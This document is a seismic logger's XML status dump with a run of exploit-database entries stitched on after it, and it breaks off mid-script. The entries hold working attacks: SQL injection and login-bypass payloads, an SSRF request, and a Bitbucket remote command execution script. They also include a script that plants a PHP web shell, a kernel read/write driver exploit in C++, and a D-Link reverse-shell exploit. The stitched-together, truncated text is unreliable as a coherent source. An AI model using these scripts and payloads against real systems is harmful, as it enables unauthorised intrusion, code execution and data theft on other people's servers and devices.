title='Fix'>3D</reading> <reading status='100' display-primary='true' path='last_fix' title='Timestamp of last fix'>2022-06-14T11:26:53Z</reading> <reading status='-1' display-primary='true' path='latitude' units='°' title='Latitude'>13.909917</reading> <reading status='-1' display-primary='true' path='longitude' units='°' title='Longitude'>100.593734</reading> <reading status='-1' display-primary='true' path='elevation' units='m' title='Elevation'>3</reading> <reading status='100' display-primary='true' path='sv_count' title='Count of satellites in view'>26</reading> <reading status='100' display-primary='true' path='sv_used' title='Count of satellites used in fix'>12</reading> <reading status='-1' display-primary='true' path='sv_online' title='Timestamp of last nmea sentence'>2022-06-14T11:26:52Z</reading> <reading status='100' display-primary='true' path='rs232_detect' title='RS232 device detect'>true</reading> </module> <module status='-1' display-primary='true' path='ntp' title='NTP'> <reading status='-1' display-primary='false' path='mode' title='Timing mode'>direct_gps</reading> <reading status='-1' display-primary='true' path='mode_desc' title='Timing mode'>NTP is using a GPS reference source.</reading> <reading status='100' display-primary='true' path='locked' title='Clock locked'>true</reading> <reading status='100' display-primary='true' path='estimated_error' units='s' title='Estimated error'>0.000131</reading> <reading status='-1' display-primary='true' path='clock_source' title='Clock source'>GPS</reading> <reading status='-1' display-primary='false' path='peer' title='Peer'>127.127.28.1</reading> <reading status='-1' display-primary='false' path='peer_refid' title='Peer&apos;s reference ID'>GPS</reading> </module> <module status='-1' display-primary='true' path='seedlink-out.0' title='SEEDlink network server (instance 1)'> <reading status='-1' display-primary='true' path='num_records' title='Total number of records seen'>22682743</reading> <reading status='100' display-primary='true' path='last5_records' title='Number of records seen in last 5 minutes'>655</reading> <reading status='-1' display-primary='true' path='seq' title='Current sequence number'>3382931</reading> <reading status='100' display-primary='true' path='num_clients' title='Number of clients connected'>7</reading> <list status='-1' display-primary='true' path='clients' title='Clients'> <list-item status='-1' display-primary='true' path='2DF96A1C' title='Client #1700'> <reading status='-1' display-primary='true' path='remote_ip' title='Remote IP address'>123.160.221.22</reading> <reading status='-1' display-primary='true' path='remote_port' title='Remote TCP port'>21100</reading> <reading status='-1' display-primary='true' path='dialup' title='Dialup mode'>false</reading> <reading status='-1' display-primary='true' path='seqno' title='Last sequence no'>0</reading> </list-item> <list-item status='-1' display-primary='true' path='79C29121' title='Client #3412'> <reading status='-1' display-primary='true' path='remote_ip' title='Remote IP address'>113.53.234.98</reading> <reading status='-1' display-primary='true' path='remote_port' title='Remote TCP port'>33964</reading> <reading status='-1' display-primary='true' path='dialup' title='Dialup mode'>false</reading> <reading status='-1' display-primary='true' path='seqno' title='Last sequence no'>0</reading> </list-item> <list-item status='-1' display-primary='true' path='5060E6FF' title='Client #3581'> <reading status='-1' display-primary='true' path='remote_ip' title='Remote IP address'>203.114.125.67</reading> <reading status='-1' display-primary='true' path='remote_port' title='Remote TCP port'>48666</reading> <reading status='-1' display-primary='true' path='dialup' title='Dialup mode'>false</reading> <reading status='-1' display-primary='true' path='seqno' title='Last sequence no'>3221351</reading> </list-item> <list-item status='-1' display-primary='true' path='B1A1AB18' title='Client #3723'> <reading status='-1' display-primary='true' path='remote_ip' title='Remote IP address'>113.53.234.98</reading> <reading status='-1' display-primary='true' path='remote_port' title='Remote TCP port'>45158</reading> <reading status='-1' display-primary='true' path='dialup' title='Dialup mode'>false</reading> <reading status='-1' display-primary='true' path='seqno' title='Last sequence no'>3382931</reading> </list-item> <list-item status='-1' display-primary='true' path=' 91FC71C' title='Client #3720'> <reading status='-1' display-primary='true' path='remote_ip' title='Remote IP address'>221.128.101.50</reading> <reading status='-1' display-primary='true' path='remote_port' title='Remote TCP port'>55776</reading> <reading status='-1' display-primary='true' path='dialup' title='Dialup mode'>false</reading> <reading status='-1' display-primary='true' path='seqno' title='Last sequence no'>3382931</reading> </list-item> <list-item status='-1' display-primary='true' path='599CD113' title='Client #3721'> <reading status='-1' display-primary='true' path='remote_ip' title='Remote IP address'>118.175.2.50</reading> <reading status='-1' display-primary='true' path='remote_port' title='Remote TCP port'>60818</reading> <reading status='-1' display-primary='true' path='dialup' title='Dialup mode'>false</reading> <reading status='-1' display-primary='true' path='seqno' title='Last sequence no'>3382931</reading> </list-item> <list-item status='-1' display-primary='true' path='BAB80847' title='Client #3722'> <reading status='-1' display-primary='true' path='remote_ip' title='Remote IP address'>203.114.125.67</reading> <reading status='-1' display-primary='true' path='remote_port' title='Remote TCP port'>53984</reading> <reading status='-1' display-primary='true' path='dialup' title='Dialup mode'>false</reading> <reading status='-1' display-primary='true' path='seqno' title='Last sequence no'>3382931</reading> </list-item> </list> </module> <module status='-1' display-primary='true' path='storage' title='Storage'> <reading status='100' display-primary='true' path='state' title='State'>Inactive</reading> <reading status='100' display-primary='true' path='recording_state' title='Recording state'>Last flush good</reading> <reading status='-1' display-primary='true' path='last_accessed' title='Last accessed'>2022-06-14T08:10:14Z</reading> <reading status='-1' display-primary='true' path='free_space_pct' title='Free space'>27.2%</reading> <reading status='-1' display-primary='false' path='free_space' units='bytes' title='Available space'>17449811968</reading> <reading status='-1' display-primary='true' path='size' units='bytes' title='Storage size'>64134021120</reading> <reading status='100' display-primary='false' path='fs_type' title='Filesystem type'>VFAT</reading> <list status='-1' display-primary='false' path='clients' title='Clients'> </list> </module> <module status='-1' display-primary='true' path='system' title='Linux system'> <reading status='-1' display-primary='false' path='serial_number' title='Serial number'>DAS-405D62</reading> <reading status='-1' display-primary='true' path='uptime' units='s' title='System uptime'>10307538</reading> <reading status='-1' display-primary='true' path='load_average' title='Load Average'>1.72</reading> <reading status='100' display-primary='true' path='root_free_space' units='bytes' title='Root filesystem free space'>437809152</reading> <reading status='100' display-primary='true' path='root_percent_free_space' title='Root filesystem percentage space free'>77.0%</reading> <reading status='-1' display-primary='true' path='build_label' title='Software repository label'>&example;</reading> <reading status='-1' display-primary='true' path='build_version' title='Software build number'>15809</reading> <reading status='-1' display-primary='true' path='build_machine' title='Build machine'>CMG-DAS</reading> <reading status='-1' display-primary='true' path='last_reboot_1' title='Reboot 1'>2021-04-08T05:06:17Z</reading> <reading status='-1' display-primary='true' path='last_reboot_2' title='Reboot 2'>2021-04-08T07:02:50Z</reading> <reading status='-1' display-primary='true' path='last_reboot_3' title='Reboot 3'>2021-04-08T08:00:33Z</reading> <reading status='-1' display-primary='true' path='last_reboot_4' title='Reboot 4'>2021-04-08T08:30:41Z</reading> <reading status='-1' display-primary='true' path='last_reboot_5' title='Reboot 5'>2021-04-08T08:39:15Z</reading> <reading status='-1' display-primary='true' path='last_reboot_6' title='Reboot 6'>2021-04-08T08:46:24Z</reading> <reading status='-1' display-primary='true' path='last_reboot_7' title='Reboot 7'>2021-04-08T10:08:51Z</reading> <reading status='-1' display-primary='true' path='last_reboot_8' title='Reboot 8'>2021-04-09T07:10:41Z</reading> <reading status='-1' display-primary='true' path='last_reboot_9' title='Reboot 9'>2021-10-07T06:48:35Z</reading> <reading status='-1' display-primary='true' path='last_reboot_10' title='Reboot 10'>2022-02-15T04:14:30Z</reading> <reading status='100' display-primary='true' path='temperature' units='°C' title='System temperature'>43.875</reading> <reading status='100' display-primary='true' path='voltage' units='V' title='Power supply voltage'>12.75</reading> <reading status='100' display-primary='true' path='current' units='A' title='Power supply current'>0.442</reading> <reading status='100' display-primary='true' path='sensor_A_voltage' units='V' title='Sensor A voltage'>12.675</reading> <reading status='100' display-primary='true' path='sensor_A_current' units='A' title='Sensor A current'>0.289</reading> <reading status='100' display-primary='true' path='sensor_B_voltage' units='V' title='Sensor B voltage'>12.725</reading> <reading status='100' display-primary='true' path='sensor_B_current' units='A' title='Sensor B current'>0.002</reading> </module> </xml-status> ```

# Exploit Title: WorkOrder CMS 0.1.0 - SQL Injection # Date: Sep 22, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://github.com/romzes13/WorkOrderCMS # Software Link: https://github.com/romzes13/WorkOrderCMS/archive/refs/tags/v0.1.0.zip # Version: 0.1.0 # Tested on: Linux # Auth Bypass: username:' or '1'='1 password:' or '1'='1 #sqlmap -r workorder.req --threads=10 --level 5 --risk 3 --dbs --dbms=mysql # POST Requests: Parameter: #1* ((custom) POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: userName=1'='1&password=1/' AND (SELECT 3761 FROM(SELECT COUNT(*),CONCAT(0x7170627071,(SELECT (ELT(3761=3761,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- UUhY!1111'/ Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: userName=1'='1&password=1/';SELECT SLEEP(5)#!1111'/ Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: userName=1'='1&password=1/' AND (SELECT 6822 FROM (SELECT(SLEEP(5)))lYsh)-- YlDI!1111'/ Parameter: #2* ((custom) POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: userName=1'='1&password=1/!1111' AND (SELECT 2010 FROM(SELECT COUNT(*),CONCAT(0x7170627071,(SELECT (ELT(2010=2010,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tqtn/ Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: userName=1'='1&password=1/!1111';SELECT SLEEP(5)#/ Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (SLEEP) Payload: userName=1'='1&password=1/!1111' OR SLEEP(5)-- XuTW/

# Exploit Title: wkhtmltopdf 0.12.6 - Server Side Request Forgery # Date: 20/8/2022 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: https://wkhtmltopdf.org # Software Link: https://wkhtmltopdf.org/downloads.html # Version: 0.12.6 # Tested on: Windows ASP.NET <http://asp.net/> POST /PDF/FromHTML HTTP/1.1 Host: vulnerable.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: <length> Dnt: 1 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close __RequestVerificationToken=Token&header=<PDFstructure+>....&data= <PDFstructure+>....<iframe+src=“http://10.10.10.1”>

# Exploit Title: Bitbucket v7.0.0 - RCE # Date: 09-23-2022 # Exploit Author: khal4n1 # Vendor Homepage: https://github.com/khal4n1 # Tested on: Kali and ubuntu LTS 22.04 # CVE : cve-2022-36804 #****************************************************************# #The following exploit is used to exploit a vulnerability present #Atlassian Bitbucket Server and Data Center 7.0.0 before version #7.6.17, from version 7.7.0 before version 7.17.10, from version #7.18.0 before version 7.21.4, from version 8.0.0 before version #8.0.3, from version 8.1.0 before version 8.1.3, and from version #8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 #Usage Example # python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'cat /etc/passwd' # python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'id' #The server will send a 500 http response with the stout output from the # command executed. #****************************************************************# #!/usr/bin/python3 import argparse import urllib from urllib import request import re #argument setup parser = argparse.ArgumentParser(description='Program to test bitbucket vulnerability CVE-2022-36804') parser.add_argument("--url", help="Set the target to attack. [REQUIRED]", required=True ) parser.add_argument("--cmd", help="Set the command to execute. [DEFAULT ID]", required=True, default='id') args = parser.parse_args() cmd= urllib.parse.quote(args.cmd) #reads from the public repository what is available requ = request.urlopen(args.url+ "/repos?visibility=public") response = requ.read() #select a public project and stores it in a variable project = re.findall('7990/projects/(.*)/repos/', str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[-1] #Selects a public repo and stores it in a vatiable file = re.findall('/repos/(.*)/browse', str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[0] # Exploitation try : attack = request.urlopen(args.url + "/rest/api/latest/projects/" + project + "/repos/" + file + "/archive?prefix=ax%00--exec=%60"+cmd+"%60%00--remote=origin") print (attack.response()) except urllib.error.HTTPError as e: body = e.read().decode() # Read the body of the error response print (body)

# Exploit Title: "camp" Raspberry Pi camera server 1.0 - Authentication Bypass # Date: 2022-07-25 # Exploit Author: Elias Hohl # Vendor Homepage: https://github.com/patrickfuller # Software Link: https://github.com/patrickfuller/camp # Version: < bf6af5c2e5cf713e4050c11c52dd4c55e89880b1 # Tested on: Ubuntu 20.04 # CVE : CVE-2022-37109 "camp" Raspberry Pi camera server Authentication Bypass vulnerability https://medium.com/@elias.hohl/authentication-bypass-vulnerability-in-camp-a-raspberry-pi-camera-server-477e5d270904 1. Start an instance of the "camp" server: python3 server.py --require-login 2. Fetch the SHA-512 password hash using one of these methods: curl http://localhost:8000/static/password.tx%74 OR curl http://localhost:8000/static/./password.txt --path-as-is OR curl http://localhost:8000/static/../camp/password.txt --path-as-is 3. Execute the following python snippet (replace the hash with the hash you received in step 2). from tornado.web import create_signed_value import time print(create_signed_value("5895bb1bccf1da795c83734405a7a0193fbb56473842118dd1b66b2186a290e00fa048bc2a302d763c381ea3ac3f2bc2f30aaa005fb2c836bbf641d395c4eb5e", "camp", str(time.time()))) 4. In the browser, navigate to http://localhost:8000/, add a cookie named "camp" and set the value to the result of the script from step 3, then reload the page. You will be logged in.

# Exploit Title: NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi # Exploit Author: Elias Hohl # Date: 2022-08-01 # Vendor Homepage: https://basixonline.net # Software Link: https://wordpress.org/plugins/nex-forms-express-wp-form-builder/ # Tested on: Ubuntu 20.04 # CVE : CVE-2022-3142 Authenticated SQL injection vulnerability in the "NEX Forms" Wordpress plugin https://medium.com/@elias.hohl/authenticated-sql-injection-vulnerability-in-nex-forms-wordpress-plugin-35b8558dd0f5 1. Start a new Wordpress instance using docker-compose. 2. Install the NEX Forms plugin. 3. Open the URL "/wp-admin/admin.php?page=nex-forms-dashboard&form_id=1" in your browser. Save the request to "nex-forms-req.txt" via Burp Suite. 4. Execute the following command: sqlmap -r nex_forms_req.txt -p form_id --technique=T --dbms=mysql --level 5 --risk 3 sqlmap will find a time-based blind payload: Parameter: form_id (GET) Type: time-based blind Title: MySQL >=5.0.12 AND time-based blind (query SLEEP) Payload: page=nex-forms-dashboard&form_id=1 AND (SELECT 4715 FROM (SELECT(SLEEP(5)))nPUi)

# Exploit Title: Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection # Exploit Author: Elias Hohl # Date: 2022-07-23 # Vendor Homepage: https://translatepress.com/ # Software Link: https://wordpress.org/plugins/translatepress-multilingual/ # Version: < 2.3.3 # Tested on: Ubuntu 20.04 # CVE : CVE-2022-3141 Authenticated SQL injection vulnerability in "Translatepress Multilingual" Wordpress plugin https://medium.com/@elias.hohl/authenticated-sql-injection-vulnerability-in-translatepress-multilingual-wordpress-plugin-effc08eda514 1. Start a new Wordpress instance using docker-compose. 2. Install the translatepress-multilingual plugin. Important note: If there are more than two languages allowed in a kind of premium plan, the exploit might be slightly different. We might need to insert deletion requests between each injection to prevent payloads being executed again. Also note that the en_us_en_gb dictionary table must exist. You might need to add these languages first so the table gets created. 3. Connect your browser to Burp Suite, log in to Wordpress and add any language from the dropdown (the url to do this is /wp-admin/options-general.php?page=translate-press). In Burp Suite, do a right click→ copy to file, and save it as translatepress_req.txt. 4. Go to /sample-page/?trp-edit-translation=preview (a URL to translate an arbitrary post). Again, in Burp Suite do a right mouse click → save to file, and save it as translatepress_req_2.txt. 5. Attack using sqlmap: sqlmap -r translatepress_req.txt -p trp_settings%5Btranslation-languages%5D%5B%5D --dbms=mysql --second-req translatepress_req_2.txt --technique=T --level 5 --risk 3 sqlmap will find a time-based blind payload: Parameter: trp_settings[translation-languages][] (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: option_page=trp_settings&action=update&_wpnonce=ca410d0e89&_wp_http_referer=/wp-admin/options-general.php?page=translate-press%26settings-updated=true&trp_settings[default-language]=en_US&trp_settings[publish-languages][]=en_US&trp_settings[translation-languages][]=en_US&trp_settings[translation-languages-formality][]=default&trp_settings[url-slugs][en_US]=en_us&trp_settings[translation-languages][]=en_GB WHERE 4372=4372 AND (SELECT 6967 FROM (SELECT(SLEEP(5)))ZDtR)-- bsZU&trp_settings[publish-languages][]=en_GB&trp_settings[translation-languages-formality][]=default&trp_settings[url-slugs][en_GB]=en&trp_settings[native_or_english_name]=english_name&trp_settings[add-subdirectory-to-default-language]=no&trp_settings[force-language-to-custom-links]=yes&trp_settings[shortcode-options]=flags-full-names&trp_settings[menu-options]=flags-full-names&trp_settings[trp-ls-floater]=yes&trp_settings[floater-options]=flags-full-names&trp_settings[floater-color]=dark&trp_settings[floater-position]=bottom-right&trp_email_course_email=

# Exploit Title: Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated) # Google Dork: N/A # Date: 2022-9-23 # Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11 # Vendor Homepage: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/diagnostic_0.zip # Tested on: windows 11 - XAMPP # Version: 1.0 # Authentication Required: bypass login with sql injection #/usr/bin/python3 import requests import os import sys import time import random # clean screen os.system("cls") os.system("clear") logo = ''' ################################################################## # # # Exploit Script ( Online Diagnostic Lab Management System ) # # # ################################################################## ''' print(logo) url = str(input("Enter website url : ")) username = ("' OR 1=1-- -") password = ("test") req = requests.Session() target = url+"/diagnostic/login.php" data = {'username':username,'password':password} website = req.post(target,data=data) files = open("rev.php","w") payload = "<?php system($_GET['cmd']);?>" files.write(payload) files.close() hash = random.getrandbits(128) name_file = str(hash)+".php" if "Login Successfully" in website.text: print("[+] Login Successfully") website_1 = url+"/diagnostic/php_action/createOrder.php" upload_file = { "orderDate": (None,""), "clientName": (None,""), "clientContact" : (None,""), "productName[]" : (None,""), "rateValue[]" : (None,""), "quantity[]" : (None,""), "totalValue[]" : (None,""), "subTotalValue" : (None,""), "totalAmountValue" : (None,""), "discount" : (None,""), "grandTotalValue" : (None,""), "gstn" : (None,""), "vatValue" : (None,""), "paid" : (None,""), "dueValue" : (None,""), "paymentType" : (None,""), "paymentStatus" : (None,""), "paymentPlace" : (None,""), "productImage" : (name_file,open("rev.php","rb")) } up = req.post(website_1,files=upload_file) print("[+] Check here file shell => "+url+"/diagnostic/assets/myimages/"+name_file) print("[+] can exect command here => "+url+"/diagnostic/assets/myimages/"+name_file+"?cmd=whoami") else: print("[-] Check username or password")

/* # Exploit Title: System Mechanic v15.5.0.61 - Arbitrary Read/Write # Date: 26-09-2022 # Exploit Author: Brandon Marshall # Vendor Homepage: https://www.iolo.com/ # Tested Version - System Mechanic version 15.5.0.61 # Driver Version - 5.4.11 - amp.sys # Tested on OS - 64 bit Windows 10 (18362) # Fixed Version - System Mechanic 17.5.0.116 # CVE : CVE-2018-5701 */ #include <iostream> #include <Windows.h> #include <psapi.h> #include <stdio.h> #pragma warning(disable:4996) typedef struct _kernelDriverInformation { char* imageName; void* imageBase; }kernelDriverInformation, * PKernelDriverInformation; typedef struct _functionInformation { char* functionName; void* functionOffset; void* functionBase; }functionInformation, * PFunctionInformation; void callDeviceIoControl(HANDLE deviceHandle, void* inputBuffer, DWORD inputBufferSize) { DWORD bytesReturned; NTSTATUS status = DeviceIoControl(deviceHandle, 0x226003, inputBuffer, inputBufferSize, NULL, NULL, (LPDWORD)&bytesReturned, (LPOVERLAPPED)NULL); } HANDLE getDeviceHandle(char* name) { DWORD generic_read = 0x80000000; DWORD generic_write = 0x40000000; HANDLE handle = CreateFileA((LPCSTR)name, GENERIC_READ | generic_write, NULL, NULL, 0x3, NULL, NULL); return handle; } void* CreateWriteAddresInAMPsKernelMemoryIOCTLBuffer(void* addressToDereference, SIZE_T bufferSize) { byte* maliciousBuffer = (byte*)malloc(bufferSize); *(ULONGLONG*)maliciousBuffer = (ULONGLONG)5; // funciton pointer, this will be 5 *(ULONGLONG*)(maliciousBuffer + 0x8) = (ULONGLONG)(maliciousBuffer + 0x20); //(maliciousBuffer); pointer to parameters *(ULONGLONG*)(maliciousBuffer + 0x10) = (ULONGLONG)(maliciousBuffer + 0x10); //(maliciousBuffer + 0x20);// (0x1); pointer to write return value *(ULONGLONG*)(maliciousBuffer + 0x18) = (ULONGLONG)0;//(ULONGLONG)(maliciousBuffer + 0x40); // unknown *(ULONGLONG*)(maliciousBuffer + 0x20) = (ULONGLONG)16; // this will be 16 *(ULONGLONG*)(maliciousBuffer + 0x28) = (ULONGLONG)0; // param2 *(ULONGLONG*)(maliciousBuffer + 0x30) = (ULONGLONG)addressToDereference; // param3 *(ULONGLONG*)(maliciousBuffer + 0x38) = (ULONGLONG)0; // param4 return (void*)maliciousBuffer; } void* CreateReadDWORDFromKernelMemoryLeakIOCTLBuffer(SIZE_T bufferSize) { byte* maliciousBuffer = (byte*)malloc(bufferSize); *(ULONGLONG*)maliciousBuffer = (ULONGLONG)5; // funciton pointer, this will be 5 *(ULONGLONG*)(maliciousBuffer + 0x8) = (ULONGLONG)(maliciousBuffer + 0x20); //(maliciousBuffer); pointer to parameters *(ULONGLONG*)(maliciousBuffer + 0x10) = (ULONGLONG)(maliciousBuffer + 0x10); //(maliciousBuffer + 0x20);// (0x1); pointer to write return value *(ULONGLONG*)(maliciousBuffer + 0x18) = (ULONGLONG)0;//(ULONGLONG)(maliciousBuffer + 0x40); // unknown *(ULONGLONG*)(maliciousBuffer + 0x20) = (ULONGLONG)16; // this will be 16 *(ULONGLONG*)(maliciousBuffer + 0x28) = (ULONGLONG)2; // param2 *(ULONGLONG*)(maliciousBuffer + 0x30) = (ULONGLONG)(maliciousBuffer + 0x40); // param3 *(ULONGLONG*)(maliciousBuffer + 0x38) = (ULONGLONG)(maliciousBuffer + 0x48); // param4 *(ULONGLONG*)(maliciousBuffer + 0x40) = (ULONGLONG)0; //unknown *(ULONGLONG*)(maliciousBuffer + 0x48) = 0xffffffff; // param1 return (void*)maliciousBuffer; } void* CreateWriteDWORDFromKernelMemoryIOCTLBuffer(void* addressToWriteTo, SIZE_T bufferSize) { byte* maliciousBuffer = (byte*)malloc(bufferSize); *(ULONGLONG*)maliciousBuffer = (ULONGLONG)5; // funciton pointer, this will be 5 *(ULONGLONG*)(maliciousBuffer + 0x8) = (ULONGLONG)(maliciousBuffer + 0x20); //(maliciousBuffer); pointer to parameters *(ULONGLONG*)(maliciousBuffer + 0x10) = (ULONGLONG)(maliciousBuffer + 0x10); //(maliciousBuffer + 0x20);// (0x1); pointer to write return value *(ULONGLONG*)(maliciousBuffer + 0x18) = (ULONGLONG)0;//(ULONGLONG)(maliciousBuffer + 0x40); // unknown *(ULONGLONG*)(maliciousBuffer + 0x20) = (ULONGLONG)16; // this will be 16 *(ULONGLONG*)(maliciousBuffer + 0x28) = (ULONGLONG)2; // param2 *(ULONGLONG*)(maliciousBuffer + 0x30) = (ULONGLONG)addressToWriteTo; // param3 *(ULONGLONG*)(maliciousBuffer + 0x38) = (ULONGLONG)(maliciousBuffer + 0x40); // param4 *(ULONGLONG*)(maliciousBuffer + 0x40) = (ULONGLONG)0xffffffff; return (void*)maliciousBuffer; } DWORD leakDWORD(void* addressToLeak, HANDLE deviceHandle, SIZE_T bufferSize) { void* writeAddresInAMPsKernelMemoryIOCTLBuffer = CreateWriteAddresInAMPsKernelMemoryIOCTLBuffer(addressToLeak, bufferSize); callDeviceIoControl(deviceHandle, writeAddresInAMPsKernelMemoryIOCTLBuffer, bufferSize); free(writeAddresInAMPsKernelMemoryIOCTLBuffer); //address should now be written in kernel memory void* ReadDWORDFromKernelMemoryLeakIOCTLBuffer = CreateReadDWORDFromKernelMemoryLeakIOCTLBuffer(bufferSize); callDeviceIoControl(deviceHandle, ReadDWORDFromKernelMemoryLeakIOCTLBuffer, bufferSize); DWORD returnVal = *(DWORD*)((byte*)ReadDWORDFromKernelMemoryLeakIOCTLBuffer + 0x40); free(ReadDWORDFromKernelMemoryLeakIOCTLBuffer); return returnVal; } void writeDWORD(void* addressToWrite, void* PDWORDToWrite, HANDLE deviceHandle, SIZE_T bufferSize) { void* writeAddresInAMPsKernelMemoryIOCTLBuffer = CreateWriteAddresInAMPsKernelMemoryIOCTLBuffer(PDWORDToWrite, bufferSize); callDeviceIoControl(deviceHandle, writeAddresInAMPsKernelMemoryIOCTLBuffer, bufferSize); free(writeAddresInAMPsKernelMemoryIOCTLBuffer); //address should now be written in kernel memory void* ReadDWORDFromKernelMemoryLeakIOCTLBuffer = CreateWriteDWORDFromKernelMemoryIOCTLBuffer(addressToWrite,bufferSize); callDeviceIoControl(deviceHandle, ReadDWORDFromKernelMemoryLeakIOCTLBuffer, bufferSize); free(ReadDWORDFromKernelMemoryLeakIOCTLBuffer); return; } void* leakQWORD(void* addressToLeak, HANDLE deviceHandle, SIZE_T bufferSize) { DWORD firstDWORD = leakDWORD(addressToLeak, deviceHandle, bufferSize); DWORD secondDWORD = leakDWORD((byte*)addressToLeak + 0x4, deviceHandle, bufferSize); void** Pqword = (void**)malloc(0x8); for (int i = 0; i < 4; i++) { ((byte*)Pqword)[i] = ((byte*)&firstDWORD)[i]; ((byte*)Pqword)[i + 4] = ((byte*)&secondDWORD)[i]; } return (*(void**)Pqword); } void writeQWORD(void* addressToWrite, void* QWORDToWrite, HANDLE deviceHandle, SIZE_T bufferSize) { writeDWORD(addressToWrite, QWORDToWrite, deviceHandle, bufferSize); writeDWORD((byte*)addressToWrite + 0x4, ((byte*)QWORDToWrite + 0x4), deviceHandle, bufferSize); } int main(int argc, char* argv[]) { ULONGLONG addressToReadorWrite = strtoull(argv[2], NULL, 16); HANDLE deviceHandle = getDeviceHandle((char*)"\\\\.\\AMP"); SIZE_T size = 0x300; if (strcmp(argv[1], "read") == 0) { void* leakedQWORD = leakQWORD((void*)addressToReadorWrite, deviceHandle, size); printf("Value stored at virtual address %0llx is %0llx", addressToReadorWrite, leakedQWORD); } else if (strcmp(argv[1], "write") == 0) { ULONGLONG QWORDToWrite = strtoull(argv[3], NULL, 16); writeQWORD((void*)addressToReadorWrite, (void*)&QWORDToWrite, deviceHandle, size); printf("Wrote %0llx to virtual address %0llx", QWORDToWrite, addressToReadorWrite); } }

# Exploit Title: D-Link DNR-322L <=2.60B15 - Authenticated Remote Code Execution # Date: 13.09.2022 # Exploit Author: luka <[email protected]> # Exploit Writeup: https://lukasec.ch/posts/dlink_dnr322.html # Vendor Homepage: https://dlink.com # Vendor Advisory: https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10305 # Software Link: http://legacyfiles.us.dlink.com/DNR-322L/REVA/FIRMWARE # Version: <= 2.60B15 # Tested on: Debian, Windows 10 """ # Vulnerability Inside the configuration backup from "Maintenance/System/Configuration Settings" is the bash script "rc.init.sh". The device does not check the integrity of a restored configuration backup which enables editing of set bash script. This bash script will be executed when the device boots. # Usage exploit.py [-h] -U USERNAME [-P PASSWORD] -t TARGET -l LHOST -p LPORT options: -h, --help show this help message and exit -U USERNAME, --username USERNAME Username, ex: admin -P PASSWORD, --password PASSWORD Password for the specified user -t TARGET, --target TARGET IP of the target, ex: 192.168.99.99 -l LHOST, --lhost LHOST IP for the reverse shell to connect back to, ex: 123.123.123.123 -p LPORT, --lport LPORT Port for the reverse shell to connect back to, ex: 8443 """ import argparse, socket, requests, base64, urllib, os, shutil, tarfile, random, string from ipaddress import ip_address args = argparse.ArgumentParser() args.add_argument( "-U", "--username", type=str, required=True, dest="username", help="Username, ex: admin", ) args.add_argument( "-P", "--password", type=str, required=False, dest="password", help="Password for the specified user", ) args.add_argument( "-t", "--target", type=str, required=True, dest="target", help="IP of the target, ex: 192.168.99.99", ) args.add_argument( "-l", "--lhost", type=str, required=True, dest="lhost", help="IP for the reverse shell to connect back to, ex: 123.123.123.123", ) args.add_argument( "-p", "--lport", type=int, required=True, dest="lport", help="Port for the reverse shell to connect back to, ex: 8443", ) args = args.parse_args() # base64 + url encode string # returns string def b64_url_encode(data): enc = data.encode("utf-8") encB = base64.b64encode(enc) encUrl = urllib.parse.quote(str(encB, "utf-8")) return encUrl # since user input is always unsafe, test IPs try: ip_address(args.target) except Exception: print("[!] Target IP is not a valid IP address") exit(1) try: ip_address(args.lhost) except Exception: print("[!] Reverse shell IP is not a valid IP address") exit(1) # check if target is online try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(2) # hardcoded http, change if needed s.connect((args.target, 80)) s.close() except Exception: print("[!] Target is not online") exit(1) print("[+] Target is online") # login param authUrl = "http://" + args.target + "/cgi-bin/login_mgr.cgi" authHeaders = {"content-type": "application/x-www-form-urlencoded"} authCheckCmd = "cmd=ui_check_wto" session = requests.Session() # if password is empty supply dont supply anything if not args.password: authBody = ( "cmd=login&port=&mydlink=0&protocol=0&R_language=en&username=" + args.username + "&pwd=&ssl_port=443&f_login_type=0&f_url=" ) else: authBody = ( "cmd=login&port=&mydlink=0&protocol=0&R_language=en&username=" + args.username + "&pwd=" + b64_url_encode(args.password) + "&ssl_port=443&f_login_type=0&f_url=" ) try: # login reqLogin = session.post(authUrl, headers=authHeaders, data=authBody) # check if successful reqCheck = session.post(authUrl, headers=authHeaders, data=authCheckCmd) if "success" in reqCheck.text: print("[+] Login successful") else: print("[!] Error during login, check credentials") exit(1) except Exception as error: print(error) print("[!] Error during login, check credentials") exit(1) # download backup print("[*] Downloading backup") if os.path.exists("backup_clean"): os.remove("backup_clean") # download param downloadUrl = "http://" + args.target + 